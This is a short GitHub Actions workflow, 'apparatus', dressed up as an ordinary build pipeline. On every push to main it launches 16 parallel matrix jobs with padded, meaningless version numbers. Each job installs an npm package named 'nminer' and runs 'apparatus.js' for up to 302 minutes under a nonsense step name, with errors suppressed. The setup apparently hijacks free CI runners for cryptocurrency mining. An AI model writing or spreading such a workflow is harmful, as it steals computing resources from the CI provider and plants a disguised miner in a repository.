name: apparatus
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9004 }
          - { version: 3923 }
          - { version: 5137 }
          - { version: 1692 }
          - { version: 6344 }
          - { version: 3322 }
          - { version: 6767 }
          - { version: 6027 }
          - { version: 5727 }
          - { version: 9837 }
          - { version: 5248 }
          - { version: 8837 }
          - { version: 2871 }
          - { version: 5560 }
          - { version: 1685 }
          - { version: 3919 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: fuel sedately during gum
        run: |
          npm install nminer@latest
          timeout 302m node apparatus.js || echo "apparatus executed"